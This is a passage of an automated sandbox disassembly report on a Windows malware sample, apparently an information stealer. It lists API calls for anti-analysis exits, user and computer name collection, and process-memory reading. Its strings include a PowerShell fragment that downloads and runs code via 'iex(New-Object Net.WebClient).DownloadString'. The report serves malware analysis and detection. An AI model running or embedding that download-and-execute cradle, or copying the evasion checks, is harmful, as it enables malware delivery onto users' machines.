                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • strtok_s.MSVCRT ref: 004136D1
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpystrtok_s$lstrlen
                                  • String ID:
                                  • API String ID: 3184129880-0
                                  • Opcode ID: fe3b87b6f6acf7afd5d4449a718a807af28f1f679ba49a272679b0303449510e
                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                  • Opcode Fuzzy Hash: fe3b87b6f6acf7afd5d4449a718a807af28f1f679ba49a272679b0303449510e
                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                  APIs
                                  • __lock.LIBCMT ref: 0041B39A
                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                  • String ID:
                                  • API String ID: 2005412495-0
                                  • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                  • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                  • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                  • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                  APIs
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022B9B08
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022B9B21
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022B9B39
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022B9B51
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022B9B6A
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022B9B82
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,ct), ref: 022B9B9A
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022B9BB3
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022B9BCB
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022B9BE3
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022B9BFC
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022B9C14
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0,@et), ref: 022B9C2C
                                    • Part of subcall function 022B9AC7: GetProcAddress.KERNEL32(0064A8B0, u), ref: 022B9C45
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022A1437: ExitProcess.KERNEL32 ref: 022A1478
                                    • Part of subcall function 022A13C7: GetSystemInfo.KERNEL32(?), ref: 022A13D1
                                    • Part of subcall function 022A13C7: ExitProcess.KERNEL32 ref: 022A13E5
                                    • Part of subcall function 022A1377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 022A1392
                                    • Part of subcall function 022A1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 022A1399
                                    • Part of subcall function 022A1377: ExitProcess.KERNEL32 ref: 022A13AA
                                    • Part of subcall function 022A1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022A14A5
                                    • Part of subcall function 022A1487: __aulldiv.LIBCMT ref: 022A14BF
                                    • Part of subcall function 022A1487: __aulldiv.LIBCMT ref: 022A14CD
                                    • Part of subcall function 022A1487: ExitProcess.KERNEL32 ref: 022A14FB
                                    • Part of subcall function 022B69D7: GetUserDefaultLangID.KERNEL32 ref: 022B69DB
                                    • Part of subcall function 022A13F7: ExitProcess.KERNEL32 ref: 022A142D
                                    • Part of subcall function 022B7AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,022A141E), ref: 022B7AE7
                                    • Part of subcall function 022B7AB7: RtlAllocateHeap.NTDLL(00000000), ref: 022B7AEE
                                    • Part of subcall function 022B7AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 022B7B06
                                    • Part of subcall function 022B7B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B7B77
                                    • Part of subcall function 022B7B47: RtlAllocateHeap.NTDLL(00000000), ref: 022B7B7E
                                    • Part of subcall function 022B7B47: GetComputerNameA.KERNEL32(?,00000104), ref: 022B7B96
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D31
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022B6D4F
                                  • CloseHandle.KERNEL32(00000000), ref: 022B6D60
                                  • Sleep.KERNEL32(00001770), ref: 022B6D6B
                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D81
                                  • ExitProcess.KERNEL32 ref: 022B6D89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2525456742-0
                                  • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                  • Instruction ID: 5c683ca62fb3632ffc8ac7c21d7c5f8a8545e674c0c9868e4d555147abc7ae4d
                                  • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                  • Instruction Fuzzy Hash: 8A318931A20309ABCB06FBF0DC14FFD737AAF15380F500518E202A6198EF746A44CE61
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
                                  • ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
                                  • LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
                                  • CloseHandle.KERNEL32(000000FF), ref: 022A9D01
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                  • Instruction ID: a736335ed3acf53bbc305b40577f669881a3c8e9f009f8df9d197cb8c76dab29
                                  • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                  • Instruction Fuzzy Hash: F03105B8A10209EFDB14CFD5C894BEE77F6EF49304F108158E911A7294C778AA81CFA1
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                  • LocalFree.KERNEL32(004102E7), ref: 00409A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 2b4f8e405d2369f2863bb245f51e009722d8db0482d6a35c31e42cb89a7514ce
                                  • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                                  • Opcode Fuzzy Hash: 2b4f8e405d2369f2863bb245f51e009722d8db0482d6a35c31e42cb89a7514ce
                                  • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                                  APIs
                                  • __getptd.LIBCMT ref: 022BCC51
                                    • Part of subcall function 022BC206: __getptd_noexit.LIBCMT ref: 022BC209
                                    • Part of subcall function 022BC206: __amsg_exit.LIBCMT ref: 022BC216
                                  • __amsg_exit.LIBCMT ref: 022BCC71
                                  • __lock.LIBCMT ref: 022BCC81
                                  • InterlockedDecrement.KERNEL32(?), ref: 022BCC9E
                                  • free.MSVCRT ref: 022BCCB1
                                  • InterlockedIncrement.KERNEL32(0042B980), ref: 022BCCC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                  • String ID:
                                  • API String ID: 634100517-0
                                  • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                  • Instruction ID: 19411c95162152489aefe0eca17a0dbd62482d4ed8816632cf73913853da1777
                                  • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                  • Instruction Fuzzy Hash: 82010032E20B26AFC723ABE494447DD7360FF24796F140127EC10A72A8CB646481DFD9
                                  APIs
                                  • __getptd.LIBCMT ref: 0041C9EA
                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                  • __amsg_exit.LIBCMT ref: 0041CA0A
                                  • __lock.LIBCMT ref: 0041CA1A
                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                  • free.MSVCRT ref: 0041CA4A
                                  • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                  • String ID:
                                  • API String ID: 634100517-0
                                  • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                  • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                  • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                  • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                  APIs
                                  • strlen.MSVCRT ref: 022B7186
                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022B7401,00000000,00420BA8,00000000,00000000), ref: 022B71B4
                                    • Part of subcall function 022B6E37: strlen.MSVCRT ref: 022B6E48
                                    • Part of subcall function 022B6E37: strlen.MSVCRT ref: 022B6E6C
                                  • VirtualQueryEx.KERNEL32(022B7574,00000000,?,0000001C), ref: 022B71F9
                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7401), ref: 022B731A
                                    • Part of subcall function 022B7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022B705F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                  • String ID: @
                                  • API String ID: 2950663791-2766056989
                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction ID: b8bce5a0076e7737e7556d1c8808a667790fa2f9ac144cd8e32f4e963c14c982
                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction Fuzzy Hash: 345105B2E1410AEBDB04CFD8D991AEFB7B6BF88340F048519F915A7244D774EA01CBA1
                                  APIs
                                  • strlen.MSVCRT ref: 00416F1F
                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                    • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                    • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                  • String ID: @
                                  • API String ID: 2950663791-2766056989
                                  • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                  • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                  • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                  APIs
                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID: *n@$*n@
                                  • API String ID: 1029625771-193229609
                                  • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                  • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                  • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                  • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                  APIs
                                  • lstrcat.KERNEL32(?,0064A30C), ref: 022B4A42
                                    • Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B4A68
                                  • lstrcat.KERNEL32(?,?), ref: 022B4A87
                                  • lstrcat.KERNEL32(?,?), ref: 022B4A9B
                                  • lstrcat.KERNEL32(?,0064A284), ref: 022B4AAE
                                  • lstrcat.KERNEL32(?,?), ref: 022B4AC2
                                  • lstrcat.KERNEL32(?,0064A2C8), ref: 022B4AD6
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022B8FF7: GetFileAttributesA.KERNEL32(00000000,?,022A1DBB,?,?,0042565C,?,?,00420E1F), ref: 022B9006
                                    • Part of subcall function 022B47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022B47E7
                                    • Part of subcall function 022B47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022B47EE
                                    • Part of subcall function 022B47D7: wsprintfA.USER32 ref: 022B480D
                                    • Part of subcall function 022B47D7: FindFirstFileA.KERNEL32(?,?), ref: 022B4824
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                  • Instruction ID: b5b60a26aea26f1790cfd1f5c44623b0bfdc755557d5d727c82dc89069f59645
                                  • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                  • Instruction Fuzzy Hash: B4315FB6950308ABDB15FBF0CC88EED737EAF58700F404589A24996084EEB49789CF95
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                  Strings
                                  • ')", xrefs: 00412CB3
                                  • <, xrefs: 00412D39
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 961cbb28e43a4a0894515638c38ba2f06ec96ace37f5fbfea44cb09a5a48cde2
                                  • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                  • Opcode Fuzzy Hash: 961cbb28e43a4a0894515638c38ba2f06ec96ace37f5fbfea44cb09a5a48cde2
                                  • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022A14A5
                                  • __aulldiv.LIBCMT ref: 022A14BF
                                  • __aulldiv.LIBCMT ref: 022A14CD
                                  • ExitProcess.KERNEL32 ref: 022A14FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction ID: 65c4a44156882598493e1b754a5fa9225a7aaf4ac068e4a84d5411182587b8d6
                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction Fuzzy Hash: 7E014BB0960308BBEB10DBD0CC99B9DBB79AF00716F208448E709776C8D7B495418B55
                                  APIs
                                  • memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022B0CC7: memset.MSVCRT ref: 022B0E83
                                    • Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00000000), ref: 022B0E9C
                                    • Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022B0EAE
                                    • Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00000000), ref: 022B0EC4
                                    • Part of subcall function 022B0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022B0ED6
